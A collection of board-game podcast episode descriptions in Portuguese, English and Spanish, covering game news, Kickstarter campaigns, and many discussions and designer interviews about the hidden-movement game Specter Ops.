https://www.kickstarter.com/projects/awakenrealms/tainted-grail-the-fall-of-avalon Este programa é um oferecimento de nossos assinantes.Seja um colaborador mensal do canal em https://www.catarse.me/meeplemaniacs

André Zabuzeta traz as notícias da semana no Jogatina BG News e logo depois, Jack recebe Fabrício do canal @After Match para um papo sobre suas impressões da CCXP 2018. 1 - A editora Thunderworks Games anunciou para 2019 o jogo Cartographers: A Roll Player Tale - jogo do brasileiro Jordy Adan com mecânica papel e caneta para 2-99 jogadores, onde os jogadores são cartógrafos que disputam por mais reputação na terras do norte no final de 4 estações. Em cada estação os jogadores, através de desenhos em suas folhas de mapa, buscam atender as demandas da Rainha Gimnax via controlar regiões com postos avançados e reduzir o avanços dos Draguls. http://bit.ly/2QttCEU 2 - Durante as atualizações no KS do Project: ELITE a CMON anunciou a próxima campanha será do Blood Rage Digital. Essa versão digital será para modos single e multiplayer, além disso a campanha terá alguns conteúdos exclusivos para a versão física do título. https://www.kickstarter.com/projects/cmon/blood-rage-digital 3 - A editora Calliope Games anunciou que em 2019 terá uma campanha através do Kickstarter do Tsuro: Phoenix Rising - esse título será uma reimplementação do clássico Tsuro e terá miniaturas de fênix para 2-8 jogadores. https://boardgamegeek.com/boardgame/266177/tsuro-phoenix-rising 4 - A Stonemaier Games publicou um teaser do seu próximo título: Wingspan, desenvolvido por Elizabeth Hargrave e atenderá de 1-5 jogadores. Conforme a página do jogo no BGG o jogo contará com sistema de carddriven, rolagem de dados e elementos de engine building: https://boardgamegeek.com/boardgame/266192/wingspan 5 - a editora Ludofy anunciou a fusão entre as editoras Mandala Jogos e Ludofy - sob o título GROK - conforme a imagem abaixo, os títulos voltados para o público infantil, festivo, familiar e casual ainda será publicado via Mandala Jogos, e os títulos a partir de casual até pesado ficará sob a Ludofy. Confiram mais informações divulgadas na transmissão do Rafael Verri: https://www.facebook.com/ludofy/videos/512741015869594 6 - A editora CMON em parceira com a Cranio Creations anunciaram para início de 2019 o Walls of York - um jogo para 2-4 jogadores que tem como objetivo construir barreiras, com peças plásticas num tabuleiro em grid, para proteger suas cidades das pilhagens vikings, e quem conter mais moedas no final da 2ª era vence o jogo. https://www.boardgamegeek.com/boardgame/247980/walls-york 7 - Durante o evento PAX Unplugged 2018, que rolou entre 30/11 e 02/12 de 2018 na Pensilvânia em Philadelphia, a IDW Games anunciou o jogo de tabuleiro de Metal Gear Solid, que será do designer Emerson Matsuuchi, que é designer do jogo Specter Ops e da série Century: Rota das Especiarias. Será um jogo de espionagem tática cooperativa para 1-4 jogadores baseada na famosa franquia de video game criada por Hideo Kojima. https://www.google.com/search?q=metal+gear+solid&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj7g8arw5jfAhWDFZAKHfIhBmcQ_AUIDigB&biw=1920&bih=976#imgrc=_ 8 - Na última terça-feira, dia 04/12, durante a transmissão aqui no canal do Meeple Maniacs a Galápagos Jogos anunciou para o mercado brasileiro o KeyForge: Call of the Archons e a publicação está prevista para o 1º semestre de 2019. http://bit.ly/keyforgebr 9 - {KS} Começou via Kickstarter a campanha pela Awaken Realms do Tainted Grail: Fall of Avalon - um jogo cooperativo de aventura no universo dos contos Arthuriano para 1-4 jogadores com 8 miniaturas, 4 tabuleiros de jogador, muitas cartas, manuais e livros, e que garante uma campanha de 15 cenários com 30-40 horas de duração. Já arrecadou US$ 1,945,275 dos US$ 50,910 pedidos, com 17,957 apoiadores e faltam 22 dias para o final da arrecadação. https://www.kickstarter.com/projects/awakenrealms/tainted-grail-the-fall-of-avalon Este programa é um oferecimento de nossos assinantes.Seja um colaborador mensal do canal em https://www.catarse.me/meeplemaniacs

PWe welcome back Brenna Noonan from Starling Games to talk about their newest 1 vs. many game, Anomaly, live on Kickstarter on October 21, 2018.  This project was formerly called Ø: Fear Nothing. However, it struggled out of the gate, so Starling decided to pull the plug, repackage, offer a lower price point, and present the same game with a different name - Anomaly. Jason gives a bit of context for the campaign relaunch before presenting the episode. After the preamble, we present the former episode in its entirety. Where you hear the name "Ø: Fear Nothing", please translate that in your head as Anomaly. We get into where the (former) name came from and also how Anomaly distinguishes itself mechanically from similar 1 vs. Many games like Specter Ops. Anomaly probably has a bit too much interaction here to support solo play, but fans of high level, above the table cooperative play might be very interested in what it has to offer. Finally, somewhere in the episode, Jason gets on his soapbox and beseeches gamers everywhere to give companies a chance!

I hope you're planning your Arkhipov Day festivities. Don't get me wrong, I dig Stanislav Petrov as much as the next guy, but for my money Vasili Arkhipov is the man, and he doesn't get nearly enough credit. Because, you know, he either saved your life or your ancestors' lives--the least we could do is give the man a holiday. He doesn't even have a card in Twilight Struggle! See, I brought it back to games in the end.Games Played Last Week: -Galaxy Trucker: Missions 3m00s (Vlaada Chvátil, CGE, 2015)-Terraforming Mars: Prelude 6m04s (Jacob Fryxelius, Stronghold, 2018)-Quartermaster General: Prelude 7m01s (Ian Brody, Griggling Games, 2018)-Star Wars: Imperial Assault - Jabba's Realm 9m24s (Todd Michlitsch & Paul Winchester, FFG, 2017)-Specter Ops 10m24s (Emerson Matssuchi, Plaid Hat Games, 2015)-Master of the Galaxy 14m54s (Timofey Bokarev & Konstantin Seleznev, Ares Games, 2018)-Paper Tales: Beyond the Gate 19m38s (Masato Uesugi, Strongold, 2018)News (and why it doesn't matter)-Fog of Love expands to LGBTQ scenarios 24m22s-Z-Man Lords over Vegas 25m34s-SVWAG SWAG: Take our stuff 26m20s-Pfister Blacks Out Hong Kong 27m46s-Mac Gerdts brings the love in Concordia 28m37s-Terraforming Mars digitally 29m40s-Chip Theory's neoprene obsession 30m00sFeature Game: 31m28s-Level 7 [Omega Protocol] (Will Schoonover, Privateer Press, 2013)Topic: Keeping Games Moving 57m42s

I hope you're planning your Arkhipov Day festivities. Don't get me wrong, I dig Stanislav Petrov as much as the next guy, but for my money Vasili Arkhipov is the man, and he doesn't get nearly enough credit. Because, you know, he either saved your life or your ancestors' lives--the least we could do is give the man a holiday. He doesn't even have a card in Twilight Struggle! See, I brought it back to games in the end.Games Played Last Week: -Galaxy Trucker: Missions 3m00s (Vlaada Chvátil, CGE, 2015)-Terraforming Mars: Prelude 6m04s (Jacob Fryxelius, Stronghold, 2018)-Quartermaster General: Prelude 7m01s (Ian Brody, Griggling Games, 2018)-Star Wars: Imperial Assault - Jabba's Realm 9m24s (Todd Michlitsch & Paul Winchester, FFG, 2017)-Specter Ops 10m24s (Emerson Matssuchi, Plaid Hat Games, 2015)-Master of the Galaxy 14m54s (Timofey Bokarev & Konstantin Seleznev, Ares Games, 2018)-Paper Tales: Beyond the Gate 19m38s (Masato Uesugi, Strongold, 2018)News (and why it doesn't matter)-Fog of Love expands to LGBTQ scenarios 24m22s-Z-Man Lords over Vegas 25m34s-SVWAG SWAG: Take our stuff 26m20s-Pfister Blacks Out Hong Kong 27m46s-Mac Gerdts brings the love in Concordia 28m37s-Terraforming Mars digitally 29m40s-Chip Theory's neoprene obsession 30m00sFeature Game: 31m28s-Level 7 [Omega Protocol] (Will Schoonover, Privateer Press, 2013)Topic: Keeping Games Moving 57m42s

At Tabletop Bellhop we answer your game and game night questions, go "Ask The Bellhop" at https://tabletopbellhop.com/. Ep #9 Under the Hood. Mermaid Adventures, Terra Mystica, and Gloomhaven before we deep dive into game mechanics. Please subscribe to our YouTube ChannelThis is the Ninth episode of Tabletop Bellhop Live, an edited version of our live show recorded on September 26th, 2018. Join us as we stream live every week Wednesday’s at Nine Thirty Eastern: https://www.twitch.tv/tabletopbellhopDisclosure: Some links below are Amazon Affiliate links. As an Amazon Associate, we earn from qualifying purchases. This episode includes:---Viewer/Listener Feedback--- We read off and respond to listener feedback. Send feedback to moe@tabletopbellhop.com or sean@tabletopbellhop.com---Tabletop Gaming Weekly--- A look at what games hit The Bellhop's table over the last week. Board Game Arena, 7 Wonders, Race for the Galaxy, Terra Mystica, Terraforming Mars, Tales of Equestria, Mermaid Adventures, GloomhavenOther links: Windsor Sandwich Shop, Shut Up & Sit Down Gloomhaven ReviewRelated Blog Posts: https://tabletopbellhop.com/playing-tabletop-games/wdypm-sept24/---Announcements---You can find us all across the web now and we grow by the support of listeners and viewers like you, so please take a minute to subscribe to our content on your favorite platform or give us a like, thumbs up or review.We have a newsletter, sign up for weekly updates in your mail. https://newsletter.tabletopbellhop.com---Ask The Bellhop--- Each week we answer at least one viewer question. This week: NecroDaddy80 on Twitch asks: “What game mechanics do you prefer?”Games mentioned approximately in order mentioned: Caylus, Puerto Rico, Clank!, Core Worlds, Carcassonne, Isle of Skye, Pandemic, FASA Star Trek, Race for the Galaxy, Warhammer Underworlds: Shadespire, Through the Desert, Agricola, El Grande, Cry Havok, 7 Wonders, Power Grid, Going, Going, GONE! Poker, Spartacus: A Game of Blood and Treachery, Hammer of the Scots, Star Wars, Imperial Assault, Zombicide, Command & Colors Ancients, The Thing: Infection at Outpost 31, Clue, Magic The Gathering, Medieval Academy, Dominion, Concordia, Hyperborea, Orleans, The Duke, Bandu, Drop It!, Pitchcar, Monopoly, Pictionary, Pictomania, Russian Railroads, Risk, Kemet, Rising Sun, Chess, Onitama, Bohnanza, Mahjong Ticket To Ride, Advanced Squad Leader, Battlelore 2e, Starship Troopers, Hanabi, Chinatown, Fury of Dracula, Specter Ops, Scotland Yard, Mansions of Madness, Star Wars Imperial Assault, XCOM, Azul, Wasteland Express Delivery Service, Tsuro, Hellapagos (the Survivor game Sean mentions), Werewolf, Nine Men’s Morris, Tokaido, CV, Blackjack, 1812 Invasion of Canada, Pillars of the Earth, Space Alert, Fallout The Board Game, Untold: Adventures Await, Rory’s Story Cubes, Gloomhaven, Xia, Legends of a Drift System, Catan, Chocolate Edition, Yahtzee, Saint Malo, Shipyard, Gin Rummy, Ticket to Ride, Robo Rally Mechs Vs. Minions Race for the Galaxy, The Thing: Infection at Outpost 31, Battlestar Galactica 1846, San Francisco Cable Car, Biblios, Munchkin, Rumble in the Dungeon, Clank! In! Space!, Carcassonne, Patchwork, Dominos, Terraforming Mars, Catan, Diamonds, Hearts, Spades, Twilight Imperium, Other links: XCOM Enemy Unkown Columbia Games (Block Wargames) Flip Florey’s Super Saturday Board Game Serial, Related Blog Post: https://tabletopbellhop.com/gaming-advice/game-mechanics/* --- Blog Plug and Patreon Shout Out ---* Head over to the Tabletop Bellhop Blog where you can read more about today’s topics and more. The Tabletop Bellhop Blog: https://tabletopbellhop.com If you enjoyed the show be sure to tip The Bellhop at: patreon.com/tabletopbellhopFind us all over the web:Facebook www.facebook.com/tabletopbellhop/Twitter witter.com/tabletopbellhopInstagram www.instagram.com/tabletopbellhop/Google Plus plus.google.com/u/1/communities/105133123664243159789BoardGameGeek boardgamegeek.com/guild/3347YouTube www.youtube.com/channel/UCez3cu7peTRAcb1ZJF4j5A?subconfirmation=1Twitch twitch.tv/tabletopbellhop

Today we’re celebrating our one year anniversary, and because this episode is coming out a day late, it is actually coming out on our one year anniversary! So in honor of making it a full year, we’re going back to our very first category and revisiting hidden movement with Specter Ops and Nuns on the Run. In our Broader View, we reflect on the last year of recording this podcast. Thank you to everyone that has been on this journey with us! [00:00:00] - Introduction [00:01:07] - Hidden Movement [00:02:12] - Specter Ops [00:20:01] - Nuns on the Run [00:31:25] - Comparison [00:37:11] - Other Hidden Movement Games [00:41:40] - Broader View

Emerson Matsuuchi has had some hits with Century: Spice Road, Crossfire and Specter Ops. But what about an abstract game about underwater coral placement? Join the MFGCast as we talk about Reef by Plan B Games. http://mfgcast.com/wp-content/uploads/2018/09/Episode_202_Final.mp3

Tim Jennette (Metal Meeple), and Matt RoBear are joined by special guests:  designer Emerson Matsuuchi (Century, Reef, Volt, Specter Ops), Ann Pohl (Boardgame Corner), and Roy Cannaday (Epic Gaming Night podcast), to talk about Gencon 2018 and other very cool things! This episode was recorded on Sunday August 5th at 11 am Est at Gencon 2018

Published on Apr 25, 2018 It is time for the motley to make their move on Abford Pharma. **Pre-show ends at 13:00** Join our heroes in the World of Darkness as Sophia, Patches and Braum navigate a fine line between Glamour and Banality. In Changeling: the Dreaming, faerie souls live in human hosts in the modern world. Watch live on Twitch: http://www.twitch.tv/jonverrall Check out http://www.rpgclinic.com for character backstories, video archives, forums, and more! #ChangelingTS Follow us! http://www.twitter.com/jonverrall http://www.twitter.com/zen_r0b0 http://www.twitter.com/elizabethaneale http://www.twitter.com/shumphrey1212 Want to send us stuff? Use my P.O. Box! Elizabeth Neale CP 22586 Monkland PO Montreal, QC H4A 1E0

Join Isaac as he shares all of his adventures from Origins with you! We have play-throughs of prototype games, reviews, and interviews with multiple game designers and distributors! Enjoy!Intro - :21USAopoly - 1:09Tasty Minstrel Games - 9:48Emerson Matsuuchi (Century: Spice Road, Specter Ops, Reef) - 12:03Brotherwise Games (Boss Monster) - 27:30Late Night Play Test - Dr. Horribles Evil League of Evil - 30:48Wizkids - 39:05Calliope - 48:17Join the conversation on any of the following platforms!www.GamingWithSidekicks.comYouTube ChannelFacebookInstagramDirect Link

The week of Top 100 Cooperative Games continues! You guys know the drill - go ahead and check out the Broken Meeple YouTube channel for the original video version of this list: https://www.youtube.com/channel/UCmjyHBcqxxQjrg0KUN944dQ   Timestamps provided for user friendliness. Enjoy!   3:41 - #40 - Legendary: Marvel 9:57 - #39 - Escape: Curse of the Temple 13:27 - #38 - Exit/ Unlock 17:06 - #37 - Sherlock Holmes: Consulting Detective 20:16 - #36 - Not Alone 24:56 - #35 - Elder Sign 30:09 - #34 - Forbidden Island 32:07 - #33 - Paperback 35:15 - #32 - Specter Ops 39:55 - #31 - Professor Evil and the Citadel of Time  

In Games in Schools and Libraries 101 JS Bragg and Bethany MacMillan join Kathleen Mercury talk about how they teach a course on leadership at Miami University of Ohio using board games. Bethany MacMillanCoordinator of Student Activities, Miami University Middletown CampusFacebook: GamingGirl.Bethany (message me also to tell me who you are, please)Email:JS BraggAssistant Director, Student Activities & The Cliff Alexander Office of Fraternity & Sorority Life, Miami UniversityTwitter, Instagram, etc: @JotaEsetheGeekBoardGameGeek: jotaeseFacebook: JSBragg (message me also to tell me who you are, please)E-mail: JSBragg@MiamiOH.eduAbout the classBlog: http://blogs.miamioh.edu/tabletop/Original Player’s Handbook (syllabus): https://drive.google.com/file/d/0B0g_xFM37S-kQkY1MXJLM2VDblU/view?usp=sharingSponsoring Departments:Miami University EDL Department: http://miamioh.edu/ehs/academics/departments/edl/Miami University IMS Department: http://miamioh.edu/cca/aims/Miami University Center for Teaching Excellence: http://miamioh.edu/cte/Miami University Division of Student Affairs: http://miamioh.edu/student-life/student-affairs/index.htmlTheories: Bloom’s Taxonomy of Learning (Bloom)Learning Partnership Model (Baxter Magolda)Drew Dudley: http://www.drewdudley.comResources:The Shapes of Leadership (by Phil Stamper (pstamper1@hotmail.com)  and Michael McNeil) NASAGA: NASAGA.org   Facebook: nasagaorgTwitter: @nasagaEveryday Leadership: https://www.youtube.com/watch?v=hVCBrkrFrBEThe Leadership Game: https://www.youtube.com/watch?v=EuB9S6fzMigThe Game Has No Winners https://www.youtube.com/watch?v=b3ADu08wQE0First Follower: https://www.youtube.com/watch?v=fW8amMCVAJQHeifetz & Linsky's Leading With An Open Heart: http://lci.typepad.com/leaders_resourcing_leader/files/LeadingWithAnOpenHeart.pdfKouzes & Posner's Five Practices of Exemplary Leadership: http://www.leadershipchallenge.com/about-section-our-approach.aspxGames/Topics Breakdown: Week, Tabletop Game(s)Leadership Themes1 Resistance, FoundationalVocabulary Building2 Secret Hitler, HanabiViews of Team Leadership/Theories of Leadership3 Betrayal at the House on the HillViews of Personal Leadership/Theories of Leadership4 Mysterium, Corrupted KingdomsWhat is Identity? Who am I?5 Survive, 2 Rooms and a BoomValues6 Ladies and GentlemenIdentity and Interactions7 Wits & Wagers, Say Anything, 7 Wonders, Spyfall 2Views of Identity and Self: Section Review8 Pandemic, Ultimate WerewolfGroup Roles and Dynamics9 Captain Sonar, Forbidden IslandGroup Communication10 TIME Stories, Pathfinder Adventure  Card Game  “Victory Points”: What Counts as “Successful” Leadership?11 The Grizzled, Telestrations, Codenames, Specter OpsGroup Leadership and Social Responsibilities: Section Review12-14 No Games to Purchase for these weeks- Student Created Tabletop GamesInnovative Leadership, Leadership Through Gaming  Games in Schools and Libraries is produced in association with Inverse Genius and the Georgetown County Library System.Games in Schools and Libraries Guild at Board Game GeekKathleen's resources https://www.kathleenmercury.com/Email us: schoolsandlibraries@gmail.comThe ideas expressed by libraries included in the podcast are not expressly endorsed by the Georgetown County Library System. 

Originally aired in November of 2015, our first episode brings Zach, Sean and Chad together to discuss the hidden movement game Specter Ops from Plaid Hat Games.

Podcast Interview With Andy Robbins, Rohan Vazarkar, SpecterOps by The Neo4j Graph Database Community

This episode the Dukes... ... Share their recent plays of: Unlock: Squeek & Sausage The Rose King Study In Emerald: 2nd Edition Cosmic Kaboom Seikatsu Scythe - The Wind Gambit Expansion (7:02) ... Discuss the latest in gaming news including: The announcement of Specter Ops expansion - Broken Covenant The announcement of Warhammer 40,000: Heroes of Blackreach from Games Workshop and Devil Pigs (29:56) ... Interviews Lance Myxter (the Undead Viking) from Tasty Minstrel Games about their latest Deluxified Kickstarter for Downfall, hitting Kickstarter on October 17, 2017 (34:49). ... Review Greater Than Games' Spirit Island (1:09:15);  ... Look back at their reviews of Potion Explosion and Pandemic: Reign of Cthulhu in their Dukes' Double-Take (1:40:01); and ... Discuss games the lowest rated games that they really love (1:48:52).   Click here to     Twitter: @dukesofdice Facebook: /dukesofdice Dukes of Dice YouTube ChannelSubscribe on iTunes Thanks to our awesome sponsors - please give them a visit  Tasty Minstrel Games  Game Toppers LLC Arcane Wonders    

Emerson Matsuuchi, designer of Specter Ops, goes into all the ins and outs of putting together a hidden movement game. There are very few hidden movement games out there right now which means there’s still a ton to be explored. Emerson discusses the challenges he faced and his insights on the topic. The post How to Make a Great Hidden Movement Game with Emerson Matsuuchi appeared first on Board Game Design Lab.

Emerson Matsuuchi, designer of Specter Ops, goes into all the ins and outs of putting together a hidden movement game. There are very few hidden movement games out there right now which means there’s still a ton to be explored. Emerson discusses the challenges he faced and his insights on the topic. The post How to Make a Great Hidden Movement Game with Emerson Matsuuchi appeared first on Board Game Design Lab.

In this episode, Brandon and Chris got some bonus game time in over the Thanksgiving, which in no way makes up for the two day late release... but we talk about Samurai Spirit, Guild of Dungeoneering, Dishonored 2, Slamwich, Linko! and our games of the week, too. Samurai Spirit - 02:20 Guild of Dungeoneering - 06:13 Star Wars: Guild of Heroes has ships. - 09:39 Brandon's GotW: Specter Ops - 14:43 Foam Core Construction - 27:24 Further Dishonored 2 - 29:00 Slamwich and Junk Art - 33:31 Linko! - 39:42 Chris' GotW: The Castles of Burgundy card game - 42:49 Closing and Contact Info - 65:48

Recorded from War Room Studios in Albuquerque, NM : 8-9-16 This episode brought to you by BoardgameTables.com and Meeple Realty - Josh clearly doesn't know how to speak... Is it "ATAT Walker" or "A T A T Walker" - He thinks he knows the answer to all things Star Wars... Thinks!  We discuss the War Room Studio Rebuild and query the audience for suggestions - Help make War Room Studio A GREAT!  It's time for a checkin on the Brawling Brothers Guild! Topics include: Regalos del Verano wrapup, Most disappointing game of 2016, Castles of Ron Burgundy & a mention by our friends at Polyhedron Collider.  We fire up our REVAMPED "Then" segment with a look at Killer from Steve Jackson Games and then jump into our first ever War Room Studio Redeaux with a glance back at Specter Ops.  Crokinole dominates our "Now" discussion (and our play time).  Our Spartacus Board Game Review is one that we've wanted to do for a long time - it isn't Cult of the New, but we've decided to do a few older games that we want to review!  We wrap up with discussion about the mysterious and delicious Black Maple Hill Small Batch Kentucky Straight Bourbon.   Episode Timeline: 00:00:00 - This episode sponsored by BoardGameTables.com & Meeple Realty 00:00:44 - Intro + Banter 00:18:03 - BoardGameTables.com - Not just a gaming table 00:20:10 - Then - Featuring "Killer"  00:40:10 - WarRoom Redeaux - Featuring "Specter Ops" 00:50:16 - Now 01:08:42 - Tomorrow - Featuring "Isle of Monsters" 01:12:25 - No more Grandmas Glue Stick thanks to Meeple Realty 01:14:16 - Giveaway Announcement - Dark Dealings 01:15:30 - Virtual Paper Rock Scissors - Salvation Road 01:18:50 - Spartacus Board Game Review 01:54:15 - How did Julia Child slip in here?! 01:54:33 - Feature: The Mystery of Black Maple Hill   GAME TIMESTAMPS: Colt Express - 01:03:28 Crokinole - 00:51:20 Evolution: The Beginning - 01:07:20 Isle of Monsters - 01:08:58 Killer - 00:24:18 Shogun - 00:54:20 Spartacus - 01:18:50 Specter Ops - 00:40:10

HEY NOW! We're off to Origins and we can hardly contain our excitment but we still have a show to do so here it is! Today we take a look at and review My Village from Stronghold Games. Then we look back at a favorite of our group, Specter Ops. Tony T runs down all the news from around the gaming world wild the gang comments. Then finally we host yet another Short Topic Extravaganza.

Suscríbete a La Colina de Avalon con tu iPhone o Android y no te pierdas ningún programa. Los Juegos de Mesa por Paco Gurney y C.J. Navas en Podstar.FM En un poquito más de una hora os traemos las noticias de la semana de aquí y de allí, entrevistamos a Paco Yanez a cuenta del Kickstarter de Oilfield, publicado por ABBA Games, Jugando en Pareja nos hablan del Specter Ops, continuamos con nuestro diccionario lúdico y terminamos recomendado juegos de de coser, piojos y trenes… La Colina de Avalon es posible gracias a: Nuestros Mecenas en podstar.fm/mecenas. Oyentes como tú que nos ayudan comprando en nuestras enlaces de afiliado en Amazon.es (http://podstar.fm/amazon) y Zacatrus (http://podstar.fm/zacatrus) Contenido: [00:00] Intro: “Nincompoop” de Josh Woodward. [00:56] Follow Up CJ: Mi tarde de juegos en casa de Juan Paco: He probado Deep Sea Adventure. Mooola. [02:36] Noticias: Expansiones de Days of Wonder: Miniexpansión de Cinco Tribus y Europa 1912 y Países Nórdicos para la App de Aventureros al Tren. Este fin de semana son las CLBSK A estas horas la próxima semana habrá empezado Origins. Island Hopper, próximamente por Eagle-Gryphon. De Scott Almes, ilustraciones de Kwanchai Moriya y un locurón de mecánica. iEllo anuncia la versión 2016 de King of Tokio. Massive Darkness, enésimo Kickstarter millonario de CMON Cthulhu Noticia: la entrevista a MattLeacock y Chuck Yaeger para hablar del Pandemic: Reign of Cthulhu en “The Lovecraft Ezine” [13:13] Hablamos con: Paco Yanez, autor de Oilfield. [23:10] Jugando en Pareja: Specter Ops (Zacatrus / Amazon) [34:38] Mecenas y oyentes de La Colina de Avalon. Puedes sumarte a nuestros mecenas desde podstar.fm/mecenas. Ayúdanos comprando en nuestras tiendas Afiliadas: Amazon y Zacatrus: http://podstar.fm/amazon – http://podstar.fm/zacatrus [41:47] Diccionario Lúdico: Pick up and Deliver. [46:13] Recomendaciones: Paco: Patchwork (Zacatrus / Amazon). Isle of Trains (Zacatrus / Amazon). CJ: Aloha Pioha (Zacatrus / Amazon). ¡Contacta con La Colina de Avalon por e-mail Twitter y Facebook, y suscríbete a nuestro canal de Telegram! Suscríbete a La Colina de Avalon en iTunes / Overcast / PocketCasts /  iVoox / Spreaker / Stitcher / RSS

The holidays are here and Raf & Charlie have been playing a lot of games. It's a bit of an international episode as Charlie plays a Fallout/Mad Max mashup out of Poland and Raf has a hand in causing a Euro Crisis in a game out of Germany. They wrap the episode up with their first listener suggested segment: a Holiday Gift Giving Guide. They each choose something for a Family Game, Strategy Game, OH MY GOD Game, and the perfect option for your White Elephant or gag gift events. Euro Crisis link: http://www.doppeldenk-spiele.de/news.php (There is a button to switch to English in their menu) Games Discussed: Star Wars: Rebellion, WARCULTS, Star Wars: Risk, Euro Crisis, Waste Knights, Legendary: Predator, Rhino Hero, Codenames, Dead of Winter, Specter Ops, Clockwork Wars, X-Wing Miniatures, Loopin' Chewie, and Pie Face

We discuss Specter Ops by Emerson Matsuuchi and Plaid Hat Games. In this deduction game, you play as Hunters guarding a secret base or as the Agent sent in to discover the secrets. The Agent tracks her moves in secret and the other players try to locate and kill the agent using unique player powers and a cool car. This is similar the Scotland Yard in game play, but in a nifty scifi universe. 

Too many new games! Questions (plus) Answers! Engine building games broken down! SHOW NOTES: •••What Have We've Been Playing? (00:01:40)►►► Elysium, Voyages of Marco Polo, Specter Ops, Cthulhu Realms, Flip City, Dungeon of Fortune, Bottlecap Vikings •••Games of Interest (01:09:55)►►► Legends of Andor: Chada & Thorn, The Loser's Club, Unnamed Castles of Burgundy Sequel, Council of Four, Rattle Battle Grab the Loot, Dice City, Shadowrift 2nd Edition, Legacy Time Surge, Shadowrun Crossfire High Caliber Ops, Villages of Valeria, Minerva, Shakespeare, Apollo XIII, Octo Dice •••Q&A (01:40:02)►►► How often do we play games? Do we ever play "mean" games? Do we miss playing with more than 2? Am I going to design my own game? Would I take a prototype to a publisher or Kickstarter? How does the boardgame industry compare to the videogame industry? How did you relocate from the US to Malta? More questions? Send your fragen to questions@rahdo.com! •••Top 10 Revisited (02:16:35)►►► Engine building games! Original top10 video: https://www.youtube.com/watch?v=KAKtwJa9J4s •••Help Rahdo run @ https://patreon.com/rahdo •••Send your questions to questions@rahdo.com

In our thirtieth episode, Quinten and Aaron are joined by Colby Dauch and Isaac Vega of Plaid Hat Games and Emerson Matsuuchi of Nazca Games. We all talk about the games we have been playing lately, including the upcoming Ashes from Plaid Hat Games. We don't do a formal review this episode, but interview Colby, Emerson, & Isaac, asking them about their publishing background, their creation of Specter Ops and Ashes, and we had a ton of listener questions. Then we quizzed them on their knowledge of Canada in our trivia game, Know Your Neighbour to the North. This episode is sponsored by Tasty Minstrel Games & Secret Base Games

In this episode, the Desperados throw down some recently played, board game banter, review Specter Ops ,examine Starship Troopers, rundown recent Kickstarter projects, and take a look at the digital app, Agricola. • 0:35:00 Recently Played Banter• 0:55:00 Specter Ops, Board Game Review• 1:17:00 Starship Troopers, Throwback Theater• 2:02:00 Kickstarter Corral• 2:25:00 Agricola, Digital Game Review

While at Origins Game Fair, I was able to talk with Colby Dauch of Plaid Hat Games.  We mainly chatted about Ashes: Rise of the Phoenixborn and Specter Ops. I asked Colby how they decided how thier miniatures should look, specifically, how should a werewolf look for a Plaid Hat game? At their level, does the company image go into the thought process when creating art and miniautres? Turns out, Plaid Hat Games has used the same sculptor for all of their minis, and him and Colby were friends before either of them were professionals in the board game industry. Cool. (Apologies for the audio, it was recorded on the convention floor.)

In this episode of The State of Games, Dice, Darrell, TC, and Stephanie talk about the best ways to bring game evangelism to new and inexperienced gamers, whether it's asking the best questions for curious customers at your FLGS, bringing great games to your families, or just fostering that board game excitement amongst new and old friends. All this, plus the recent contract disputes between Queen Games and Donald X., Eagle & Gryphon Games' business, Specter Ops, Cubist, Hostage Negotiator, following the rules, best Kickstarter picks, Martin Wallace, Monster Truck Mayhem, games for kids, Spyfall (of course), HABA, and so much more!

In our twenty-ninth episode, we talk about the games we have been playing lately. We also have another Dawn of the FunDead segment, with Monstrous from Secret Base Games. We also review the hidden movement game Specter Ops, and we have the second session of Boards Alive Plays: Dungeons & Dragons 5th Edition.  This episode is sponsored by Tasty Minstrel Games & Grok Gaming Mats

Mike and Geoff welcome guest Emerson Matsuuchi, designer of Specter Ops and VOLT Robot Battle, to discuss hidden and programmed movement in games. Why use these techniques? What are good and bad examples? Duration: 01:14:11

In episode 88 the founders take a look at one of Steve's favorite game styles in Specter Ops from Plaid Hat Games! Then they go back and discuss their thoughts on Amerigo one year later. Finally the gang hosts yet another short topic roundup including gaming with couples, unpainted versus painted miniatures, nostalgic games and more.

Shawn and Jonathan sit down to chat with Emerson Matsuuchi, the designer of Specter Ops. We briefly discuss International TableTop Day experiences and dive into Emerson’s experiences in game design, the origins of Specter Ops, and a Metal Gear inspired promo card that could have been. Jonathan presents this week’s Punch List where he asks […]

For this episode, Suzanne and Rhiannon come back to the table for some Chit Chat and we talk about the happenings at BGG Con. I am sure you are tired […]